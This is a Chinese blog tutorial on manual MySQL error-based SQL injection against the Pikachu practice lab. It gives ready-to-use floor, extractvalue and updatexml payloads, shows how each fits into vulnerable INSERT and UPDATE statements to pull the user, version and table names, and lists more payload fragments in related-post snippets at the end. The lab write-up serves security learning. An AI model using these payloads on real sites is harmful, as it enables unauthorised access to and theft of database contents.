mysql报错手工注入_Mysql报错型手工注入

最新推荐文章于 2023-03-19 12:01:26 发布
最新推荐文章于 2023-03-19 12:01:26 发布
阅读量235 收藏
点赞数
文章标签: mysql报错手工注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40000457/article/details/113235038
版权
本文介绍了MySQL报错注入的原理和常见函数,通过实例展示了如何利用报错注入进行数据探测,包括'insert'和'update'两种情况,并强调了两者之间的区别。同时,作者提醒读者学习交流的目的,禁止非法使用。
摘要由CSDN通过智能技术生成

👇常用报错函数注入公式👇

No.1:floor

' and (select  count(*)  from information_schema.tables group by concat((select version()),floor(rand(0)*2)))#

No.2:extractvalue

' and extractvalue(1,concat(0x7e,(select user()),0x7e))#

No.3:updatexml

' and updatexml(1,concat(0x7e,(select user())),0x7e)#

9628cec127ea11b22786c63f648fd07c.pngstart

9628cec127ea11b22786c63f648fd07c.png

一个常见注册功能点输入特殊字符,导致报错

8f6728182a7a16d22ffd0ba03aca68bf.png

查看php源码得到数据查询语句

insert into member(username,pw,sex,phonenum,email,address) values('{$getdata['username']}',md5('{$getdata['password']}'),'{$getdata['sex']}','{$getdata['phonenum']}','{$getdata['email']}','{$getdata['add']}')

代入公式No.1

' or (select count(*)  from information_schema.tables group by concat((select version()),floor(rand(0)*2))) or '

传入数据库查询语句:

insert into member(username,pw,sex,phonenum,email,address) values('{$getdata['' or (select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2))) or '']}',md5('{$getdata['test']}'),'{$getdata['']}','{$getdata['']}','{$getdata['']}','{$getdata['add']}')

方便查看我直接截个代码图

d304b995ae7f6992391c3c8aea4d5acc.png

代码图解解释

1.红色框就是测试payload

2.test就是必填的密码

3.后面分别就是性别、手机、地址,因为没填所以为NULL

查询结果:

succed!

a51a2558bcb45c7b087eff91ece08c77.png

尝试查询pikachu数据库里的第一个数据表,payload如下:

' or (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),floor(rand(0)*2))) or '

结果

1184e80b485673761bd133e7c032052e.png

代入公式No.2

' or extractvalue(1,concat(0x7e,(select user()),0x7e)) or '

结果:sussed!

980ca885b45b13a762e684cc8bfa060b.png

代入公式No.3

' or updatexml(1,concat(0x7e,(select user())),0x7e) or '

结果:sussed!

bc772fd8fdbff00c768bb4495986d085.png

02

“update”注入

一个正常的修改个人资料数据包

d0c0b0c56336990f563a1ab857cd4665.png

调试数据包测试注入点,在参数后加入特殊字符报错

3ca814824086e678c2261f25276ad9d0.png

查看PHP源代码的核心代码

0d2f39687acb984067e0bae6f59957eb.png

解释:

1.黄色框是传入数据库查询语句

2.红色箭头指向的四个参数是存入数据库的参数

利用公式No.3注入,因为这个比较简单直白,payload如下:

' and updatexml(1,concat(0x7e,(select user())),0x7e)#

则传入数据库的语句是

update member set sex='{$getdata['' and updatexml(1,concat(0x7e,(select user())),0x7e)#']}',phonenum='{$getdata['1']}',address='{$getdata['1']}',email='{$getdata['1']}' where username='{$_SESSION['sqli']['username']}'

5196f7de61d7c384925bf3a8b104b516.png

因为payload后的#号把后面语句已经注释,所以实际执行语句

update member set sex='{$getdata['' and updatexml(1,concat(0x7e,(select user())),0x7e)#

结果:sussed!

1080773c2e689cdd60da5dea9a49358a.png

01

“insert注入”和“update注入”区别

从“insert注入”和“update注入”的注入语句就可以看出有少许差异,而实质上确实有点区别。“insert注入”的主要功能点在插入表单,所以注入前后都需要用or来连接注入,不能用and连接并且后面语句不能注释,否则传入Mysql数据库的查询语句就会出现语句逻辑出错,无法进行注入。

“update注入”的主要功能点在更新表单,查看PHP源码的传入数据库命令可知,在这种情况下如果存在报错注入,可以直接用and连接注入语句注释后面语句,实际传入数据库的语句并不会出现逻辑错误。

a6da758b9cf12d165a940ab894f8f959.pngEnd

a6da758b9cf12d165a940ab894f8f959.png

!声明:本文章纯属于个人学习笔记,仅提供学习交流,切勿用于违法犯罪。

weixin_40000457
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL手工报错注入
L_KevinK的博客
08-01 1077
MySQL手工报错注入(1)测试注入点是否可用(2)爆数据库相关信息(2)爆数据库表名 (1)测试注入点是否可用 1后加 ’ 号页面报错,爆出错误信息 (2)爆数据库相关信息 报错注入语句有多种,此贴仅讲适用于此网站的一种 and updatexml(1,concat(0x7e,(select user()),0x7e),1)-- #爆数据库用户 and updatexml(1,c...
mysql报错手工注入_mysql手工注入教程
weixin_34502439的博客
02-28 162
大家早上好!,H。U。C-枫 又和大家见面啦//本来早想做这个教程的,因为前段时间做过一套mssql的手工注入教程。今天给大家带来的是php+mysql手工注入。临时找了个点,所以有些东西不能全给大家演示。以后有机会再给大家补充些教程。这个就将就看吧。目标站点:http://www.doczj.com/doc/7b381bef48d7c1c708a145e0.html/myWeb/news_con...
mysql报错注入手工方法
weixin_38023368的博客
09-04 436
以前觉得报错注入有那么一长串,还有各种concat(),rand()之类的函数,不方便记忆和使用,一直没怎么仔细的学习过。这次专门学习了一下,看了一些大牛的总结,得到一些经验,特此记录下来,以备后续巩固复习。 总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。 公式具体如下 and(select 1 from(select count(*),concat((select (select (select concat.
mysql 手工报错注入_MYSQL手工注入(详细步骤)—(2)实战演练
weixin_35064596的博客
02-11 213
0x02 MYSQL 手工注入实战——基于错误的 SQL 注入前言,之前有对MYSQL基于报错手工注入进行过介绍,但今天的实验环境,并不是基于报错的SQL注入,而是一个基于布尔的SQL盲注测试流程。这个网站的SQL注入漏洞,大概1年前就有人发现过了,我也是在找环境的过程中,突然发现的。这个网站是存在WAF的(WTS-WAF)但是这个WAF并不是很管用,只是把空格与某些重要函数放到了黑名单里面:废...
mysql报错手工注入_mysql手工注入
weixin_33526828的博客
02-28 234
1.判断是否存在注入点的方法和其他数据库类似,and 1=1 和and 1=2 2.判断数据库为oracle 提交注释字符/*,返回正常即是MySQL,否则继续提交注释符号--,该符号......实战access手工注入(通用的方法) “显示友好的HTTP错误信息”前面的钩,...Mysql 报错注入 SQL 注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注 以及延时注入, ...
手工注入教程
09-06
"MySQL报错注入详解.docx"可能详细讲解如何利用报错信息,以及如何设计触发错误的查询。 再来看MSSQL的相关部分。"Mssql报错注入详解.docx"和"Mssql盲注详解.docx"分别关注的是这两个不同的注入策略。报错注入在...
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记对 MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍。 一、MySQL 注入原理 用户输入的内容被当作 SQL 语句来执行。攻击者可以通过构造特殊的输入来inject恶意的 SQL 代码,使得...
最全干货SQL注入大合集
04-28
以下是一些具体的MySQL手工注入示例: - 联合注入:通过`UNION SELECT`来组合不同的查询结果,例如,`?id=0' UNION SELECT 1,2,3,database()--`,这将显示数据库的名称。 - 利用`GROUP_CONCAT()`函数可以聚合多列...
SQL注入(bybx).docx
09-05
2. 手工测试:单引号;1 and 1=1, 1 and 1=2;1‘ and ‘1’=1, 1‘ and ‘1’=2; 3. 使用bp的sqlmap插件 三、MYSQL相关知识 1. information_schema库:该库中有许多表,其中columns、tables、SCHEMATA三张表需要...
mysql手工注入之高级报错注入
asliheng的博客
11-29 701
mysql手工注入之高级报错注入 查看版本mysql版本 and+exists(selectfrom+(selectfrom(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c) 爆所有库 and(select 1 from(select count(*),concat((select (select ...
mysql报错注入实战_手工注入——MySQL手工注入实战和分析
weixin_39746382的博客
01-18 98
今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场。话不多说,咱们直接开始。第一步,判断注入点通过 ' 和构造 and 1=1 和 and 1=2 查看页面是否报错。这里通过and 1=1 发现页面正常。如下图。接下来,咱们再构造 and 1=2 发现页面报错,说明页面存在注入点。如下图。第二步,判断字段数通过 order by 语句,如果后面输入的...
记一次注册功能处Mysql手工报错注入
qq_36270253的博客
04-01 4136
记一次注册功能处Mysql手工报错注入 知识点:报错注入是使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息,比如select/insert/update/delete都可以使用报错来获取信息,报错注入的使用前提条件,是后台没有屏蔽数据库的报错信息,在语法发生错误的时候会显示在客户前端页面。 /////////分////////////割/////////\\\\\\线\\\\\\\\\\\ 安卓app除了反编译apk外,各功能点也有几率存在漏洞,甚至攻防演练的时候也可以从app资产寻找突破口。
mysql报错注入_mysql报错注入手工方法
weixin_36236823的博客
12-23 140
以前觉得报错注入有那么一长串,还有各种concat(),rand()之类的函数,不方便记忆和使用,一直没怎么仔细的学习过。这次专门学习了一下,看了一些大牛的总结,得到一些经验,特此记录下来,以备后续巩固复习。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。公式具体如下and(select 1 from(se...
基于报错手工注入
qq_23066945的博客
10-27 477
基于报错手工注入 实验环境:sqlli 1.首先提示,请输入ID作为参数和数值 2.构建id参数后,返回正常 3.输入转义符 \ ,得到报错信息 “1”) LIMIT 0,1 (图片上引号内的为报错信息,所以这里去掉两个引号) 由此,我们可以得到大概的SQL语句为 select * from users where id=("1") limit 0,1 尝试闭合单引号,并注释之后的...
浅谈基于报错手工注入
dzqxwzoe的博客
03-19 353
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。最后网站开发知识多少也要了解点,不过别紧张,只是学习基础知识。
SQL手工盲注、报错注入
5L2g556F5ZWl77yf
07-21 1111
报错注入,利用数据库某些机制,人为制造错误,使得注入结果都在错误信息中回显,一般在联合注入受限情况下使用;一般存在页面没有显示位,但是sql语句错误有错误输出的地方 sql盲注(SQL Injection Blind),和普通的注入原理一样,不同之处是注入后数据库和后台不回回显或回显有限的信息; 通常只能通过 “是”;“否”,反应速度的 “快”;“慢”,来判断。......
Mysql 手工注入
weixin_45625450的博客
09-14 784
p=1&id=4’ and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=‘表名’ #x%’ and 1=2 union select 1,2,group_concat(username,password),4,5,6,7,8,9,…
vue使用mysql报错ERR_CONNECTION_REFUSED
最新发布
04-09
当使用Vue连接MySQL时,出现ERR_CONNECTION_REFUSED错误通常是由于以下几个原因导致的: 1. MySQL服务器未启动:请确保你的MySQL服务器已经正确启动。你可以通过检查MySQL服务状态或者尝试重新启动MySQL来解决此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值